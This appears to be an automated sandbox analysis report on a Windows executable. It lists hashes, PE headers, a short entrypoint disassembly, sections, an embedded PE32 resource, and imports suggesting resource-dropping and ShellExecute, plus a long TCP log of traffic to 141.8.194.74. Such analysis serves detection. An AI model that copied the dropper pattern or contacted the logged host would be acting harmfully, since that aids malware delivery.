                                                SHA1:34fb36f9b553c26b0753f540b6a8af1760bb74dc
                                                SHA256:a5f4363625928d7fb64087212bd9d094972260739b274f44b53bbbd5be6d19b7
                                                SHA512:035d3806dafbd5e3a6358072363267178215c74a2f66750792e839d8f24a4244338d1a59862953eb872b5a13ae675647310818a05f1f70206f1ea15157cc8686
                                                SSDEEP:98304:b2iJbE5xmRwLHVZCC55YkdOsfMvBh0ND4wELWZ:yMaxAWHVkq5Y2fMkNDILWZ
                                                TLSH:DA16AD0179008953E0071632F2AA5D4C8BA7EE709F65E35F6DB93F6B2D373D228185A7
                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                File Icon

                                                Icon Hash:2f17b1d9dbc36535

                                                Static PE Info

                                                General

                                                Entrypoint:0x4020cc
                                                Entrypoint Section:CODE
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                DLL Characteristics:
                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:d59a4a699610169663a929d37c90be43

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                mov ecx, 0000000Ch
                                                push 00000000h
                                                push 00000000h
                                                dec ecx
                                                jne 00007FDB146D321Bh
                                                push ecx
                                                push ebx
                                                push esi
                                                push edi
                                                mov eax, 0040209Ch
                                                call 00007FDB146D2C90h
                                                xor eax, eax
                                                push ebp
                                                push 00402361h
                                                push dword ptr fs:[eax]
                                                mov dword ptr fs:[eax], esp
                                                lea edx, dword ptr [ebp-14h]
                                                mov eax, 00402378h
                                                call 00007FDB146D3069h
                                                mov eax, dword ptr [ebp-14h]
                                                call 00007FDB146D3139h
                                                mov edi, eax
                                                test edi, edi
                                                jng 00007FDB146D3456h
                                                mov ebx, 00000001h
                                                lea edx, dword ptr [ebp-20h]
                                                mov eax, ebx
                                                call 00007FDB146D30F8h
                                                mov ecx, dword ptr [ebp-20h]
                                                lea eax, dword ptr [ebp-1Ch]
                                                mov edx, 00402384h
                                                call 00007FDB146D2888h
                                                mov eax, dword ptr [ebp-1Ch]
                                                lea edx, dword ptr [ebp-18h]
                                                call 00007FDB146D302Dh
                                                mov edx, dword ptr [ebp-18h]
                                                mov eax, 00404680h
                                                call 00007FDB146D2760h
                                                lea edx, dword ptr [ebp-2Ch]
                                                mov eax, ebx
                                                call 00007FDB146D30C6h
                                                mov ecx, dword ptr [ebp-2Ch]
                                                lea eax, dword ptr [ebp-28h]
                                                mov edx, 00402390h
                                                call 00007FDB146D2856h
                                                mov eax, dword ptr [ebp-28h]
                                                lea edx, dword ptr [ebp-24h]
                                                call 00007FDB146D2FFBh
                                                mov edx, dword ptr [ebp-24h]
                                                mov eax, 00404684h
                                                call 00007FDB146D272Eh
                                                lea edx, dword ptr [ebp-38h]
                                                mov eax, ebx
                                                call 00007FDB146D3094h
                                                mov ecx, dword ptr [ebp-38h]
                                                lea eax, dword ptr [ebp-34h]
                                                mov edx, 0040239Ch

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x41eee0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                .rsrc0x90000x41eee00x41f000d516d442e1838c14787c7e406b62706bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x92600x10408Device independent bitmap graphic, 128 x 252 x 32, image size 64512, resolution 23925 x 23925 px/m0.3633427472659536
                                                RT_RCDATA0x196680x40e800PE32 executable (GUI) Intel 80386, for MS Windows0.42171764373779297
                                                RT_RCDATA0x427e680xdISO-8859 text, with no line terminators1.6153846153846154
                                                RT_RCDATA0x427e780x1very short file (no magic)9.0
                                                RT_RCDATA0x427e7c0x1very short file (no magic)9.0
                                                RT_RCDATA0x427e800x10data1.5
                                                RT_RCDATA0x427e900x1very short file (no magic)9.0
                                                RT_RCDATA0x427e940x38data1.0714285714285714
                                                RT_GROUP_ICON0x427ecc0x14data1.25

                                                Imports

                                                DLLImport
                                                kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                shfolder.dllSHGetFolderPathA
                                                shell32.dllShellExecuteA

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 25, 2024 10:17:15.243254900 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:15.483835936 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.484616041 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:15.527973890 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:15.768362045 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769170046 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769191980 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769227982 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769274950 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769318104 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769367933 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769419909 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769438982 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769459963 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.769475937 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:15.776325941 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:15.794656992 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.016479969 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.016505957 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.016525984 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.016544104 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.016563892 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.016582966 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.016588926 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.020549059 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.034888983 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.034951925 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.034996033 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035017967 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.035033941 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035080910 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035089970 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.035123110 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035161972 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035172939 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.035201073 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035238981 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035252094 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.035278082 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035320044 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035334110 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.035358906 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035397053 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035402060 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.035438061 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.035480976 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.256869078 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.256916046 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.256944895 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.256973982 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.256999016 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.257025957 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.260844946 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.260888100 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.260921001 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.260948896 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.260974884 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.261002064 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.263686895 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.263814926 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.275551081 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.275578022 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.275630951 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.276710987 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.287343979 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.528044939 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528080940 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528111935 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528132915 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528198004 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528215885 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528275967 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528316975 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528353930 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528393030 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528412104 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528475046 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528493881 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528537035 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528554916 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528666973 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528687954 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528769016 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528832912 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528852940 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528870106 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528918028 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.528959990 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529043913 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529062986 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529081106 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529114008 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529165030 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529206991 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529225111 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529253006 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529310942 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529350996 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529433012 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529453039 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529474020 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529484034 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529491901 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529514074 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529515982 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529531956 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529550076 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529552937 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529567957 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529572964 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529591084 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529608011 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529669046 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529687881 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529705048 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.529726982 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529745102 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:16.529759884 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:16.631922007 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:17:46.509736061 CEST8049736141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:17:46.509921074 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:44.693404913 CEST4973680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.107307911 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.363740921 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.363843918 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.364372969 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.620570898 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.620924950 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.620979071 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621020079 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621037006 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.621058941 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621098042 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621134996 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621193886 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.621257067 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621294975 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621334076 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621373892 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.621427059 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.877509117 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877554893 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877593994 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877631903 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877650023 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.877670050 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877682924 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.877722979 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877759933 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877799034 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877825975 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.877835989 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877845049 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.877872944 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877909899 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877948046 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.877968073 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.877985001 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878021955 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878038883 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.878077030 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878114939 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878128052 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.878153086 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878190041 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878201962 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.878228903 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878266096 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:51.878283024 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:51.878531933 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134480953 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134546995 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134589911 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134628057 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134639025 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134674072 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134710073 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134712934 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134754896 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134778976 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134799004 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134840965 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134852886 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134881973 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134921074 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134928942 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134959936 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134999990 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.135015965 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.135222912 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.135262012 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.135292053 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.137105942 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394088030 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394155979 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394197941 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394238949 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394243002 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394279957 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394308090 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394324064 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394375086 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394401073 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394431114 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394471884 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394490957 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394509077 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394548893 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394562006 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394587994 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394625902 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394642115 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394655943 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394675016 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394696951 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394705057 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394717932 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394737005 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394747019 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394753933 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394772053 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394782066 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394792080 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394815922 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394834995 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394850969 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394860983 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394879103 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394900084 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394921064 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394926071 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394941092 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394958973 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394968033 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394975901 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394995928 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395004988 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395015955 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395029068 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395032883 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395051956 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395062923 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395073891 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395092964 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395104885 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395112038 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395132065 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395149946 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395169020 CEST8049743141.8.194.74192.168.2.4
